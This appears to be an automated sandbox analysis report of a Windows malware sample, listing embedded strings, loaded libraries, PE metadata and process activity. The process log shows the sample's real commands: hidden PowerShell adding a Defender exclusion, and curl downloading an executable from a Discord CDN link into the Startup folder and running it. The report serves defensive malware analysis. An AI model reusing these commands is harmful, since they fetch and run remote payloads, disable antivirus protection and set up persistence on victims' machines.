Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014000B64C NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW,4_2_000000014000B64C
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_00000001400138E54_2_00000001400138E5
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_00000001400154F04_2_00000001400154F0
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_00000001400151604_2_0000000140015160
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_00000001400151704_2_0000000140015170
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_00000001400131754_2_0000000140013175
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_00000001400102104_2_0000000140010210
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_00000001400162104_2_0000000140016210
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014000EA484_2_000000014000EA48
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014001366E4_2_000000014001366E
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014000B7584_2_000000014000B758
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_0000000140012FDD4_2_0000000140012FDD
Source: file.exe, 00000000.00000000.2076710804.00007FF67C62B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenode.exe* vs file.exe
Source: classification engineClassification label: mal76.adwa.evad.winEXE@15/8@1/2
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\decrypted_executable.exe C:\Users\user\AppData\Local\Temp\decrypted_executable.exe
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -c Add-MpPreference -ExclusionPath ""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\decrypted_executable.exe C:\Users\user\AppData\Local\Temp\decrypted_executable.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -c Add-MpPreference -ExclusionPath ""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"Jump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: More than 8191 > 100 exports found
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: file.exeStatic file information: File size 34965741 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10f7e00
Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xef8600
Source: file.exeStatic PE information: More than 200 imports for KERNEL32.dll
